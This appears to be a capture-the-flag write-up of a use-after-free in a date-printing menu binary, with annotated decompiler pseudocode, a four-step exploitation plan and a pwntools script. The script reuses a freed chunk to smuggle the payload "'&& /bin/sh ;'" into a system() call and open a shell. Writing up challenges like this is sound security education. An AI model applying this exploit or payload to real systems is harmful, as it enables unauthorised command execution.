Time pls!
Ok this one was pretty simple; it contained a UAF (use-after-free) bug.
The vuln code snippet ...
// Decompiler pseudocode (identifiers as emitted by the tool). Duplicates a
// user-supplied string and publishes the copy in the global qword_602118,
// but only when the checked string passes the character whitelist below.
void set_foramt()
{
heap_ptr = strdup(str)
// Whitelist of strftime-style format characters. It contains no quote, '&',
// ';' or other shell metacharacters, so a string that passes this check
// cannot break out of the single-quoted argument that print() builds.
qmemcpy(&accept, "%aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^# ", 0x33uLL);
// NOTE(review): the copy is taken from `str` but the check runs on `s`;
// presumably the same buffer in the binary — confirm.
if (strspn(s, &accept) == strlen(s))
{
// Only a validated copy becomes the live format pointer. This check is the
// sole defence for the string that print() later hands to system(), and it
// guards the pointer assignment, not the heap chunk itself (see quit()).
qword_602118 = heap_ptr;
}
// NOTE(review): on a failed check heap_ptr is neither stored nor freed here,
// which looks like a leak of the strdup'd copy — confirm against the binary.
}
...
// Decompiler pseudocode. Duplicates a user-supplied string with no character
// check at all — unlike set_foramt(), nothing here validates the contents.
// Where the new chunk is stored is not visible in this snippet.
void set_zone()
{
// strdup() mallocs a fresh chunk. If a chunk of the same size class was just
// freed (see quit()), the allocator can return that same address, so any
// stale pointer to the old chunk now aliases unvalidated user data.
heap_ptr = strdup(str)
}
// Decompiler pseudocode. Frees both heap strings, then asks for confirmation.
void quit()
{
// Both globals are freed but never set to NULL, so they keep pointing at the
// released chunks and print() still dereferences qword_602118 afterwards.
// Clearing the pointers here (and refusing to use them once freed) is the
// fix for the use-after-free.
free(qword_602118)
free(qword_602120)
// gets() reads with no length bound. The pointer comparison against a
// string literal is presumably the decompiler's rendering of a single
// character check; on any answer other than 'Y' the program keeps running
// with the dangling pointers above.
if( gets(s) == "Y")
{
exit(0)
}
}
// Decompiler pseudocode. Builds a shell command line from program state and
// runs it through system().
void print()
{
// The "%s" is fed from the format-string global (qword_602118 per the
// writeup), which quit() may already have freed — this is the use-after-free.
// The argument is single-quoted, so only a quote in that string can end the
// argument early; set_foramt()'s whitelist rules a quote out, set_zone() does
// not. Calling strftime()/localtime() directly, or exec'ing date with an argv
// array rather than a shell string, would remove the command-injection
// surface regardless of the heap bug.
// NOTE(review): as shown, the call passes only dword_602120 for two
// conversions; the second argument is probably lost in decompilation.
snprintf(&command, 2048LL, 1LL, 2048LL, "/bin/date -d @%d +'%s'", dword_602120); <------- ptr used after free :)
system(&command)
}
So to exploit it
1) call set_format, which mallocs a buffer and copies our input string ('DUMMY') into it
2) now free the memory via quit, answering 'N' to avoid exiting
3) now use set_zone to allocate our payload into the same memory the format string occupied
4) now call print to execute the command; our payload breaks out of the quoted argument and we get the shell :)
# Exploit script from the writeup, driving the binary's menu with pwntools.
# Menu options follow the four steps listed above: 1 = set_format,
# 5 = quit, 3 = set_zone, 4 = print (mapping inferred from the order of
# the steps; confirm against the binary's menu text).
from pwn import *
p = process("unix")
log.info(p.recvuntil('>'))
# Step 1, set_format: store a harmless string that passes the whitelist
# ('A' is an accepted character), so the format-string global now points
# at a validated heap chunk.
p.sendline("1")
log.info(p.recvuntil(':'))
p.sendline("AAAA")
log.info(p.recvuntil('>'))
# Step 2, quit then answer 'N': both heap strings are freed, but the
# program keeps running and the format-string global is left dangling.
p.sendline("5")
log.info(p.recvuntil('?'))
p.sendline("N")
log.info(p.recvuntil('>'))
# Step 3, set_zone: strdup() of the payload reuses the freed chunk, so the
# stale format pointer now aliases text that set_format's whitelist would
# have rejected (it contains a quote, '&' and ';').
p.sendline("3")
log.info(p.recvuntil(':'))
payload = "'&& /bin/sh ;'"
p.sendline(payload)
log.info(p.recvuntil('>'))
# Step 4, print: the stale pointer is spliced into the quoted "+'%s'"
# argument of the system() command line, which is the use-after-free.
p.sendline("4")
p.interactive()